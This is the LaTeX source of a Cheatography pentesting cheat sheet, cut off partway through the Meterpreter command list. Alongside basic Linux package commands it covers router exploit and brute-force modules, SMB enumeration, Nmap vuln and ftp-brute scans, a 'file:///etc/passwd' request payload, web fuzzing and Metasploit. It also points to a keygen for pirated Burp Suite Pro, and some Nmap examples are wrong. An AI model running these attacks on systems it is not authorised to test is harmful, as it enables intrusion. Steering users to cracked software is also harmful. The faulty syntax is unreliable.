\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{Malware.py (malwaredotpy)} \pdfinfo{ /Title (linux-basics-pentesting-tutorials.pdf) /Creator (Cheatography) /Author (Malware.py (malwaredotpy)) /Subject (Linux Basics/Pentesting Tutorials Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{A3A3A3} \definecolor{LightBackground}{HTML}{F3F3F3} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Linux Basics/Pentesting Tutorials Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{Malware.py (malwaredotpy)} via \textcolor{DarkBackground}{\uline{cheatography.com/153707/cs/33030/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}Malware.py (malwaredotpy) \\ \uline{cheatography.com/malwaredotpy} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Published 6th July, 2022.\\ Updated 6th July, 2022.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{How to update/upgrade Linux: \newline % Row Count 1 (+ 1) What does APT do? \newline % Row Count 2 (+ 1) APT (Advanced Packaging Tool) is a set of core tools found inside the Debian operating system. It provides utilities for the installation and removal of software packages and dependencies on a system. \newline % Row Count 7 (+ 5) apt is a subset of apt-get and apt-cache commands providing necessary commands for package management. \newline % Row Count 10 (+ 3) while apt-get won't be deprecated, as a regular user, you should start using apt more often. \newline % Row Count 12 (+ 2) sudo apt install \newline % Row Count 13 (+ 1) Installs a package \newline % Row Count 14 (+ 1) sudo apt remove \newline % Row Count 15 (+ 1) Removes a package \newline % Row Count 16 (+ 1) sudo apt purge \newline % Row Count 17 (+ 1) Removes package with configuration \newline % Row Count 18 (+ 1) sudo apt update \newline % Row Count 19 (+ 1) Refreshes repository index \newline % Row Count 20 (+ 1) sudo apt upgrade \newline % Row Count 21 (+ 1) Upgrades all upgradable packages \newline % Row Count 22 (+ 1) sudo apt autoremove \newline % Row Count 23 (+ 1) Removes unwanted packages \newline % Row Count 24 (+ 1) sudo apt full-upgrade \newline % Row Count 25 (+ 1) Upgrades packages with auto-handling of dependencies \newline % Row Count 27 (+ 2) sudo apt search \newline % Row Count 28 (+ 1) Searches for a program \newline % Row Count 29 (+ 1) sudo apt show \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Shows package details \newline % Row Count 1 (+ 1) sudo apt list \newline % Row Count 2 (+ 1) Lists packages with criteria (installed, upgradable etc) \newline % Row Count 4 (+ 2) sudo apt edit-sources \newline % Row Count 5 (+ 1) edits sources list \newline % Row Count 6 (+ 1) sudo apt clean \newline % Row Count 7 (+ 1) The clean command clears out the local repository of downloaded package files. It removes everything except the partials folder and lock file from \seqsplit{/var/cache/apt/archives/.} Use apt clean to free up disk space when necessary, or as part of regularly scheduled maintenance. \newline % Row Count 13 (+ 6) sudo apt autoclean \newline % Row Count 14 (+ 1) autoclean is another method used to clear out the local repository of downloaded package files, just like clean. The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources, and are very likely to be useless. \newline % Row Count 20 (+ 6) sudo apt update \&\& sudo apt upgrade -y \&\& sudo apt full-upgrade -y \&\& sudo apt autoremove -y \newline % Row Count 22 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 25 (+ 3) First things to do after installing Linux: \newline % Row Count 26 (+ 1) 1. Download and Install Latest Updates \newline % Row Count 27 (+ 1) sudo apt update \&\& sudo apt upgrade \newline % Row Count 28 (+ 1) 2. Install GNOME Tweak Tool \newline % Row Count 29 (+ 1) sudo apt install gnome-tweak-tool \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{3. Install Git \newline % Row Count 1 (+ 1) sudo apt install git \newline % Row Count 2 (+ 1) 4. Install PIP \newline % Row Count 3 (+ 1) sudo apt install python3-pip \newline % Row Count 4 (+ 1) 5. Install GNOME Extensions \newline % Row Count 5 (+ 1) Just go to \seqsplit{https://extensions.gnome.org/} to download and install your preferred extensions. \newline % Row Count 7 (+ 2) 6. Play with Different Desktop Environment \newline % Row Count 8 (+ 1) To try MATE, run following command in Terminal. \newline % Row Count 9 (+ 1) sudo apt install Ubuntu-mate-desktop \newline % Row Count 10 (+ 1) To try Cinnamon, run following command in Terminal. \newline % Row Count 12 (+ 2) sudo apt-get install \seqsplit{cinnamon-desktop-environment} \newline % Row Count 14 (+ 2) To try KDE, run following command in Terminal. \newline % Row Count 15 (+ 1) sudo apt-get install kde-standard \newline % Row Count 16 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 19 (+ 3) How to install a dpkg: \newline % Row Count 20 (+ 1) dpkg is a tool for installing, removing, and querying individual packages. \newline % Row Count 22 (+ 2) dpkg -i \textasciitilde{}/Downloads/file.deb \newline % Row Count 23 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 26 (+ 3) How to fix HTB openvpn connection issue: \newline % Row Count 27 (+ 1) \# vim /etc/sysctl.conf \newline % Row Count 28 (+ 1) Set following to 0: \newline % Row Count 29 (+ 1) \seqsplit{net.ipv6.conf.all.disable\_ipv6} = 0 \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{\seqsplit{net.ipv6.conf.default.disable\_ipv6} = 0 \newline % Row Count 1 (+ 1) \seqsplit{net.ipv6.conf.lo.disable\_ipv6} = 0 \newline % Row Count 2 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 5 (+ 3) Virtual Machine Network Types: \newline % Row Count 6 (+ 1) Bridge mode: \newline % Row Count 7 (+ 1) This connects the virtual network adapter directly to the physical network \newline % Row Count 9 (+ 2) NAT: \newline % Row Count 10 (+ 1) This allows the virtual network adapter to share the host's IP address \newline % Row Count 12 (+ 2) Host Only: \newline % Row Count 13 (+ 1) This creates a private network that the virtual network adapter shares with the host \newline % Row Count 15 (+ 2) Custom: \newline % Row Count 16 (+ 1) This allows you to create your own virtual network \newline % Row Count 18 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3) Free BurpSuite Pro installation: \newline % Row Count 22 (+ 1) \seqsplit{ https://ftuapps.dev/burp-suite-professional-edition-v2-0-11-full-all-addons-keygen/} \newline % Row Count 24 (+ 2) 1. Download and Extract \newline % Row Count 25 (+ 1) 2. Run 'BurpSuite Loader \& Keygen' \newline % Row Count 26 (+ 1) 3. Press 'run' in upper right hand corner and Burpsuite will load \newline % Row Count 28 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 31 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{\seqsplit{===========================================================================================================================} \newline % Row Count 3 (+ 3) How to uncompress with tar: \newline % Row Count 4 (+ 1) -x = extract \newline % Row Count 5 (+ 1) -z = gzipped archive \newline % Row Count 6 (+ 1) -f = get from a file (must be the last command) \newline % Row Count 8 (+ 2) 'sudo tar -xzf \seqsplit{utorrent-server-3.0-ubuntu-10.10-27079.tar.gz'} \newline % Row Count 10 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 13 (+ 3) Routersploit: \newline % Row Count 14 (+ 1) Install: \newline % Row Count 15 (+ 1) sudo apt-get install python-dev python-pip libncurses5-dev git \newline % Row Count 17 (+ 2) git clone \seqsplit{https://github.com/reverse-shell/routersploit} \newline % Row Count 19 (+ 2) cd routersploit \newline % Row Count 20 (+ 1) pip install -r requirements.txt \newline % Row Count 21 (+ 1) ./rsf.py \newline % Row Count 22 (+ 1) 1. Exploits, Pick the module(Press Tab Twice to Complete Module): \newline % Row Count 24 (+ 2) exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ \newline % Row Count 28 (+ 4) rsf \textgreater{} use \seqsplit{exploits/dlink/dir\_300\_600\_rce} \newline % Row Count 29 (+ 1) 2. Creds: \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Modules located under creds/ directory allow running dictionary attacks against various network services. \newline % Row Count 3 (+ 3) Following services are currently supported: \newline % Row Count 4 (+ 1) ftp \newline % Row Count 5 (+ 1) ssh \newline % Row Count 6 (+ 1) telnet \newline % Row Count 7 (+ 1) http basic auth \newline % Row Count 8 (+ 1) http form auth \newline % Row Count 9 (+ 1) snmp \newline % Row Count 10 (+ 1) rsf \textgreater{} use creds/ \newline % Row Count 11 (+ 1) creds/ftp\_bruteforce \seqsplit{creds/http\_basic\_bruteforce} \seqsplit{creds/http\_form\_bruteforce} creds/snmp\_bruteforce creds/ssh\_default creds/telnet\_default \newline % Row Count 15 (+ 4) creds/ftp\_default \seqsplit{creds/http\_basic\_default} \seqsplit{creds/http\_form\_default} creds/ssh\_bruteforce creds/telnet\_bruteforce \newline % Row Count 18 (+ 3) rsf \textgreater{} use creds/ssh\_default \newline % Row Count 19 (+ 1) rsf (SSH Default Creds) \textgreater{} \newline % Row Count 20 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 23 (+ 3) CrackMapExec \newline % Row Count 24 (+ 1) CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. \newline % Row Count 32 (+ 8) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques. \newline % Row Count 5 (+ 5) Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. \newline % Row Count 10 (+ 5) "crackmapexec smb \textless{}IP\textgreater{}" \newline % Row Count 11 (+ 1) "crackmapexec smb \textless{}IP\textgreater{} -{}-pass-pol \newline % Row Count 12 (+ 1) enumerates password policy \newline % Row Count 13 (+ 1) "crackmapexec smb \textless{}IP\textgreater{} -{}-shares -u \textless{}random name\textgreater{} -p \textless{}random name\textgreater{} \newline % Row Count 15 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 18 (+ 3) SmbClient: \newline % Row Count 19 (+ 1) smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. \newline % Row Count 26 (+ 7) smbclient -L //\textless{}IP\textgreater{} \newline % Row Count 27 (+ 1) enumerate shares(users) on a server \newline % Row Count 28 (+ 1) smbclient //\textless{}IP\textgreater{}/\textless{}shares\textgreater{} \newline % Row Count 29 (+ 1) Mount to host OS instead of using smbclient: \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ sudo mkdir /mnt/user \newline % Row Count 1 (+ 1) sudo mount -t cifs //\textless{}IP\textgreater{}/\textless{}shares\textgreater{} /mnt/\textless{}share\textgreater{} \newline % Row Count 2 (+ 1) sudo mount -t //10.10.10.178/Data /mnt/Data \newline % Row Count 3 (+ 1) find . -ls -type f \newline % Row Count 4 (+ 1) shows files \newline % Row Count 5 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 8 (+ 3) SmbMap: \newline % Row Count 9 (+ 1) SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. \newline % Row Count 17 (+ 8) "smbmap -H \textless{}IP\textgreater{}" \newline % Row Count 18 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3) Nmap: \newline % Row Count 22 (+ 1) Top 13 Nmap command examples: \newline % Row Count 23 (+ 1) 1. Basic Nmap Scan against IP or host \newline % Row Count 24 (+ 1) "nmap 1.1.1.1" \newline % Row Count 25 (+ 1) Now, if you want to scan a hostname, simply replace the IP for the host: \newline % Row Count 27 (+ 2) "nmap cloudflare.com" \newline % Row Count 28 (+ 1) These kinds of basic scans are perfect for your first steps when starting with Nmap. \newline % Row Count 30 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{2. Scan specific ports or scan entire port ranges on a local or remote server \newline % Row Count 2 (+ 2) nmap -p 1-65535 localhost \newline % Row Count 3 (+ 1) Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below: \newline % Row Count 6 (+ 3) nmap -p 80,443 8.8.8.8 \newline % Row Count 7 (+ 1) 3. Scan multiple IP addresses \newline % Row Count 8 (+ 1) nmap 1.1.1.1 8.8.8.8 \newline % Row Count 9 (+ 1) You can also scan consecutive IP addresses: \newline % Row Count 10 (+ 1) nmap -p 1.1.1.1,2,3,4 \newline % Row Count 11 (+ 1) This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4. \newline % Row Count 13 (+ 2) 4. Scan IP ranges \newline % Row Count 14 (+ 1) nmap -p 8.8.8.0/28 \newline % Row Count 15 (+ 1) This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14. \newline % Row Count 17 (+ 2) An alternative is to simply use this kind of range: \newline % Row Count 19 (+ 2) nmap 8.8.8.1-14 \newline % Row Count 20 (+ 1) You can even use wildcards to scan the entire C class IP range, for example: \newline % Row Count 22 (+ 2) nmap 8.8.8.* \newline % Row Count 23 (+ 1) This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256. \newline % Row Count 25 (+ 2) If you ever need to exclude certain IPs from the IP range scan, you can use the "–exclude" option, as you see below: \newline % Row Count 28 (+ 3) nmap -p 8.8.8.* -{}-exclude 8.8.8.1 \newline % Row Count 29 (+ 1) 5. Scan the most popular ports \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Using "–top-ports" parameter along with a specific number lets you scan the top X most common ports for that host. \newline % Row Count 3 (+ 3) "nmap -{}-top-ports 20 192.168.1.106" \newline % Row Count 4 (+ 1) Replace "20" with the desired number. \newline % Row Count 5 (+ 1) 6. Scan hosts and IP addresses reading from a text file: \newline % Row Count 7 (+ 2) Let's suppose you create a list.txt file that contains these lines inside: \newline % Row Count 9 (+ 2) 192.168.1.106 \newline % Row Count 10 (+ 1) cloudflare.com \newline % Row Count 11 (+ 1) microsoft.com \newline % Row Count 12 (+ 1) securitytrails.com \newline % Row Count 13 (+ 1) The "-iL" parameter lets you read from that file, and scan all those hosts for you: \newline % Row Count 15 (+ 2) "nmap -iL list.txt" \newline % Row Count 16 (+ 1) 7. Save your Nmap scan results to a file \newline % Row Count 17 (+ 1) "nmap -oN output.txt securitytrails.com" \newline % Row Count 18 (+ 1) 8. Disabling DNS name resolution \newline % Row Count 19 (+ 1) If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the "-n" parameter. \newline % Row Count 23 (+ 4) "nmap -p 80 -n 8.8.8.8" \newline % Row Count 24 (+ 1) 9. Scan + OS and service detection with fast execution: \newline % Row Count 26 (+ 2) Using the "-A" parameter enables you to perform OS and service detection, and at the same time we are combining this with "-T4" for faster execution. \newline % Row Count 30 (+ 4) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ "nmap -A -T4 cloudflare.com" \newline % Row Count 1 (+ 1) 10. Detect service/daemon versions: \newline % Row Count 2 (+ 1) This can be done by using -sV parameters \newline % Row Count 3 (+ 1) "nmap -sV localhost" \newline % Row Count 4 (+ 1) 11. CVE detection using Nmap: \newline % Row Count 5 (+ 1) One of Nmap's greatest features. If you want to run a full vulnerability test against your target, you can use these parameters: \newline % Row Count 8 (+ 3) "nmap -Pn -{}-script vuln 192.168.1.105" \newline % Row Count 9 (+ 1) 12: FTP brute force attack: \newline % Row Count 10 (+ 1) "nmap -{}-script ftp-brute -p 21 192.168.1.105" \newline % Row Count 11 (+ 1) 13: Scan for MySQL on port 3306 \newline % Row Count 12 (+ 1) "nmap 10.10.10.50 -p 3306" \newline % Row Count 13 (+ 1) \seqsplit{=========================================================================================================} \newline % Row Count 16 (+ 3) How to look up IP Address for a website: \newline % Row Count 17 (+ 1) nslookup www.whateversite.com \newline % Row Count 18 (+ 1) \seqsplit{=========================================================================================================} \newline % Row Count 21 (+ 3) How to pull a file using Burpsuite: \newline % Row Count 22 (+ 1) in a Repeater tab, at the bottom of the request header type: \newline % Row Count 24 (+ 2) \seqsplit{ 'url=file:///etc/passwd'} \newline % Row Count 25 (+ 1) \seqsplit{=========================================================================================================} \newline % Row Count 28 (+ 3) \#Gobuster: \newline % Row Count 29 (+ 1) Common Command line options \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ -fw – force processing of a domain with wildcard results. \newline % Row Count 2 (+ 2) -np – hide the progress output. \newline % Row Count 3 (+ 1) -m – which mode to use, either dir or dns (default: dir). \newline % Row Count 5 (+ 2) -q – disables banner/underline output. \newline % Row Count 6 (+ 1) -t \newline % Row Count 7 (+ 1) – number of threads to run (default: 10). \newline % Row Count 8 (+ 1) -u – full URL (including scheme), or base domain name. \newline % Row Count 10 (+ 2) -v – verbose output (show all results). \newline % Row Count 11 (+ 1) -w – path to the wordlist used for brute forcing (use – for stdin). \newline % Row Count 13 (+ 2) Command line options for dns mode \newline % Row Count 14 (+ 1) -cn – show CNAME records (cannot be used with '-i' option). \newline % Row Count 16 (+ 2) -i – show all IP addresses for the result. \newline % Row Count 17 (+ 1) Command line options for dir mode \newline % Row Count 18 (+ 1) -a \textless{}user agent string\textgreater{} – specify a user agent string to send in the request header. \newline % Row Count 20 (+ 2) -c \textless{}http cookies\textgreater{} – use this to specify any cookies that you might need (simulating auth). \newline % Row Count 22 (+ 2) -e – specify extended mode that renders the full URL. \newline % Row Count 24 (+ 2) -f – append / for directory brute forces. \newline % Row Count 25 (+ 1) -k – Skip verification of SSL certificates. \newline % Row Count 26 (+ 1) -l – show the length of the response. \newline % Row Count 27 (+ 1) -n – "no status" mode, disables the output of the result's status code. \newline % Row Count 29 (+ 2) -o \textless{}file\textgreater{} – specify a file name to write the output to. \newline % Row Count 31 (+ 2) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ -p \textless{}proxy url\textgreater{} – specify a proxy to use for all requests (scheme much match the URL scheme). \newline % Row Count 2 (+ 2) -r – follow redirects. \newline % Row Count 3 (+ 1) -s \textless{}status codes\textgreater{} – comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307). \newline % Row Count 6 (+ 3) -x \textless{}extensions\textgreater{} – list of extensions to check for, if any. \newline % Row Count 8 (+ 2) -P \textless{}password\textgreater{} – HTTP Authorization password (Basic Auth only, prompted if missing). \newline % Row Count 10 (+ 2) -U \textless{}username\textgreater{} – HTTP Authorization username (Basic Auth only). \newline % Row Count 12 (+ 2) -to \textless{}timeout\textgreater{} – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s). \newline % Row Count 14 (+ 2) "gobuster dir -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-lowercase-2}.3-medium.txt -u https://10.10.10.84" \newline % Row Count 17 (+ 3) gobuster vhost -w \seqsplit{/opt/SecLists/Discovery/DNS/subdomains-top1million}.txt -u http://forwardslash.htb \newline % Row Count 20 (+ 3) \seqsplit{===========================================================================================================================} \newline % Row Count 23 (+ 3) Nikto: \newline % Row Count 24 (+ 1) It enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetration testing. \newline % Row Count 28 (+ 4) perl nikto.pl -host 209.17.116.7 -useragent bob \newline % Row Count 29 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 32 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{\#Wfuzz: \newline % Row Count 1 (+ 1) Wfuzz can be used to look for hidden content, such as files and directories, within a web server, allowing to find further attack vectors. It is worth noting that, the success of this task depends highly on the dictionaries used. \newline % Row Count 6 (+ 5) Wfuzz looking for common directories: \newline % Row Count 7 (+ 1) "wfuzz -w \seqsplit{wordlist/general/common.txt} http://testphp.vulnweb.com/FUZZ" \newline % Row Count 9 (+ 2) Wfuzz looking for common files: \newline % Row Count 10 (+ 1) "wfuzz -w \seqsplit{wordlist/general/common.txt} \textless{}site\textgreater{}/FUZZ.php" \newline % Row Count 12 (+ 2) You often want to fuzz some sort of data in the URL's query string, this can be achieved by specifying the FUZZ keyword in the URL after a question mark: \newline % Row Count 16 (+ 4) "wfuzz -z range,0-10 -{}-hl 97 \seqsplit{http://testphp.vulnweb.com/listproducts.php?cat=FUZZ"} \newline % Row Count 18 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3) Setting up Metasploit: \newline % Row Count 22 (+ 1) systemctl start postgresql \newline % Row Count 23 (+ 1) msfdb init \newline % Row Count 24 (+ 1) db\_status \newline % Row Count 25 (+ 1) Metasploit Pro: \newline % Row Count 26 (+ 1) https://localhost:3790/ \newline % Row Count 27 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 30 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Meterpreter Commands: \newline % Row Count 1 (+ 1) Core Commands \newline % Row Count 2 (+ 1) ============= \newline % Row Count 3 (+ 1) Command Description \newline % Row Count 4 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 5 (+ 1) ? Help menu \newline % Row Count 6 (+ 1) background Backgrounds the current session \newline % Row Count 8 (+ 2) bg Alias for background \newline % Row Count 10 (+ 2) bgkill Kills a background meterpreter script \newline % Row Count 12 (+ 2) bglist Lists running background scripts \newline % Row Count 14 (+ 2) bgrun Executes a meterpreter script as a background thread \newline % Row Count 16 (+ 2) channel Displays information or control active channels \newline % Row Count 18 (+ 2) close Closes a channel \newline % Row Count 19 (+ 1) \seqsplit{disable\_unicode\_encoding} Disables encoding of unicode strings \newline % Row Count 21 (+ 2) \seqsplit{enable\_unicode\_encoding} Enables encoding of unicode strings \newline % Row Count 23 (+ 2) exit Terminate the meterpreter session \newline % Row Count 25 (+ 2) get\_timeouts Get the current session timeout values \newline % Row Count 27 (+ 2) guid Get the session GUID \newline % Row Count 29 (+ 2) help Help menu \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ info Displays information about a Post module \newline % Row Count 2 (+ 2) irb Open an interactive Ruby shell on the current session \newline % Row Count 4 (+ 2) load Load one or more meterpreter extensions \newline % Row Count 6 (+ 2) machine\_id Get the MSF ID of the machine attached to the session \newline % Row Count 8 (+ 2) migrate Migrate the server to another process \newline % Row Count 10 (+ 2) pivot Manage pivot listeners \newline % Row Count 12 